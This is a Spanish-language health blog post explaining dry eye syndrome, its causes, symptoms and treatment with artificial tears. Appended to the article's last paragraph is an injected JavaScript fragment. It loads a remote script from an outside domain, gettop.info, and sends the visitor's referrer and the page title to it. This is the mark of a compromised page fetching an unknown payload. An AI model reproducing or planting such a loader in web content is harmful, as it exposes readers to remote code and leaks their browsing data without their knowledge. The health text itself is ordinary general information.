Salud y belleza » Salud

“¿Qué es el Síndrome de ojo seco?”

Sin Comentarios

El problema de sequedad, puede darse a lo largo y a lo ancho de toda la geografía del cuerpo humano. Pero, en ciertos casos, su valor se eleva aún más: los ojos, por ejemplo, representan una zona con predisposición a sufrir de esa sequedad.

Alrededor del 35% de los pacientes que acuden al oftalmólogo padecen de sequedad de ojos o del llamado “síndrome del ojo seco”.

¿De qué va este trastorno? Pues se trata de una dolencia que se produce en la zona ocular y que está dada por la evaporación de la lágrima. La sequedad de los ojos sucede cuando alguna de las cuatro capas que componen el lacrimal padece algún tipo de alteración.

Habitualmente, las causas de la aparición de la sequedad ocular se deben a alguno de los siguientes factores: contaminación del medio ambiente, exposición excesiva a las pantallas de una PC, alimentación desprovista de vitaminas y ácidos esenciales (especialmente omega 3 y el 6).

Con respecto a los síntomas: éste problema se suele manifestar por medio de sensaciones como picazón en los ojos, parpadeo continuo e irritación.

No representa un problema grave, aunque si molesto. El tratamiento médico que se suele seguir en estos casos consiste en la aplicación de lágrimas artificiales y/o pomadas para mantener el ojo húmedo.document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.